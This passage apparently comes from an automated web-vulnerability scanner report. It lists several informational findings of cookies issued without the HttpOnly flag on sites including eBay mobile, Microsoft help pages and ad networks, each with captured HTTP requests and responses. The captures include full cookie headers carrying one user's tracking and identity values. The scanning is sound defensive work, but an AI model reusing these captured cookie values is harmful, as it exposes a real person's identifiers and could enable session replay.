ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAHqgJU56oCVOoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAAB6oCVOeqAlTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 15:19:22 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsxia05c00000s926v0z4tru_3w4l/dcs.gif?&dcsdat=1311088769174&dcssip=support.microsoft.com&dcsuri=/contactus/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Help%2520and%2520Support&WT.js=Yes&WT.jv=1.5&WT.bs=1065x723&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsvid=GUID=b99db294605ea749842ddaca50c2f3af%26HASH=94b2%26LV=20115%26V=3&WT.wtsv=1&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1311019116&WT.vt_f_tlv=1311015720&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-3661456592.30151123.1311088769178&wt_date=2011/7/19&wt_dos=1&wtDrillDir=/contactus/&wtEvtSrc=support.microsoft.com/contactus/&sup_cid=cu_selector&sup_cln=en-us&sup_ct=dm&sup_ln=en-us&sup_sd=gn HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAABSPJE4UjyROoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAAAUjyROFI8kTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 15:19:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAHqgJU56oCVOoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAAB6oCVOeqAlTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 15:19:22 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.80. http://majornelson.com/gamercard/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://majornelson.com
Path:	/gamercard/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mn_gamercard=%7B%22gamer_score%22%3A%2252867%22%2C%22gamer_image%22%3A%22http%3A%2F%2Favatar.xboxlive.com%2Favatar%2FMajor%2520Nelson%2Favatarpic-l.png%22%2C%22recent_games%22%3A%5B%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2F-z%2F%2BV%2F02dsb2JhbA9ECgUAGwEfLFlVL2ljb24vMC84MDAwIAAAAAAAAPy6P%2BA%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2FUh%2Fhx%2F1Gdsb2JhbA9ECgUAGwEfL1ZWL2ljb24vMC84MDAwIAAAAAAAAPteGE0%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2FKR%2Fv2%2F0Gdsb2JhbA9ECgUAGwEfLFpRL2ljb24vMC84MDAwIAAAAAAAAP-ZGzY%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2Foc%2F1B%2F12dsb2JhbA9ECgQMGgAfWSlaL2ljb24vMC84MDAwIAAAAAAAAPhuzb4%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2Fgd%2Frx%2F02dsb2JhbA9ECgQNGwEfV1smL2ljb24vMC84MDAwIAAAAAAAAPze2p4%3D.jpg%22%5D%7D; expires=Wed, 20-Jul-2011 11:43:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gamercard/index.php HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
Referer: http://majornelson.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:43:14 GMT
Content-Type: text/x-json
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 23:43:14GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: mn_gamercard=%7B%22gamer_score%22%3A%2252867%22%2C%22gamer_image%22%3A%22http%3A%2F%2Favatar.xboxlive.com%2Favatar%2FMajor%2520Nelson%2Favatarpic-l.png%22%2C%22recent_games%22%3A%5B%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2F-z%2F%2BV%2F02dsb2JhbA9ECgUAGwEfLFlVL2ljb24vMC84MDAwIAAAAAAAAPy6P%2BA%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2FUh%2Fhx%2F1Gdsb2JhbA9ECgUAGwEfL1ZWL2ljb24vMC84MDAwIAAAAAAAAPteGE0%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2FKR%2Fv2%2F0Gdsb2JhbA9ECgUAGwEfLFpRL2ljb24vMC84MDAwIAAAAAAAAP-ZGzY%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2Foc%2F1B%2F12dsb2JhbA9ECgQMGgAfWSlaL2ljb24vMC84MDAwIAAAAAAAAPhuzb4%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2Fgd%2Frx%2F02dsb2JhbA9ECgQNGwEfV1smL2ljb24vMC84MDAwIAAAAAAAAPze2p4%3D.jpg%22%5D%7D; expires=Wed, 20-Jul-2011 11:43:14 GMT
Content-Length: 606

{"gamer_score":"52867","gamer_image":"http://avatar.xboxlive.com/avatar/Major%20Nelson/avatarpic-l.png","recent_games":["http://tiles.xbox.com/tiles/-z/+V/02dsb2JhbA9ECgUAGwEfLFlVL2ljb24vMC84MDAwIAAAA
...[SNIP]...

14.81. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=ee9b3b8ecc4b4ec2:TM=1311109135:LM=1311109135:S=cayOe7PfiMmmwdYV; expires=Thu, 18-Jul-2013 20:58:55 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.82. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lyc=CwAAAASniB1OACAAAZVbIASgAAYkTQAAyhgHYBcB3VigFCAABANIAAC14AoXBqpRAABWlARgLwG9RCAooAAGeVcAAGB3JWAXAXBfoBQgAAZBUwAAwPX1IGUDAAC0RyAEoAAASiAHARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcAUOACvwalTAAA7+znYBcBaFbgATEBoUXgAQvgBY8BAAA=; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT
pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.83. http://mobileweb.ebay.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mobileweb.ebay.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

nbuuid=e86aa901c303413980596abf8e04d882; expires=Tue, 12 Jul 2011 08:50:11 GMT; path=/; domain=.mobileweb.ebay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mobileweb.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702fe^cguid/3666b2e01300a47a44d622a6ffc19372500702fe^trm/svid%3D94316858148500702fe^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsoIQKvY*%5E

Response

14.84. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tick=1311108255065; Domain=outbrain.com; Path=/
_lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
_lvd2="iYJQahqaNoybZPBlL1y+oQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Tue, 26-Jul-2011 09:32:15 GMT; Path=/
_rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
recs-ad82f50455df441759d1d8530ecdbaac="QHChs7CRExG12Ow/i/bhLoTOUAVA7ck9pHYzRgDMxFx+vgba/12gWJv6sgRAr7jYeFcfE+OdrabgVFZDw9TGi+6jLuHWn5mlULTTird7SsSJakbqdZgl2fl7pZFJ8vmZeVMaUm5Ix9l5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 20:49:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.85. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-US/bing/ff808535.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/; expires=Fri, 19-Jul-2041 15:16:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/bing/ff808535.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=xss.cx&go=&qs=n&sk=&sc=3-4&qb=1&FORM=AXRE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; TocHashCookie=ff524484(n)/; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/; expires=Fri, 19-Jul-2041 15:16:06 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:05 GMT
Cteonnt-Length: 35993
Content-Length: 35993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Bing Help
</title
...[SNIP]...

14.86. http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808415.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/; expires=Fri, 19-Jul-2041 15:17:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808415.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/; expires=Fri, 19-Jul-2041 15:17:35 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:17:35 GMT
Cteonnt-Length: 59118
Content-Length: 59118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
All Bing Help top
...[SNIP]...

14.87. http://onlinehelp.microsoft.com/en-us/bing/ff808465.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808465.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808465.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:57 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:57 GMT
ntCoent-Length: 31062
Content-Length: 31062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Get cash back for
...[SNIP]...

14.88. http://onlinehelp.microsoft.com/en-us/bing/ff808483.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808483.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:45 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808483.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:45 GMT; path=/
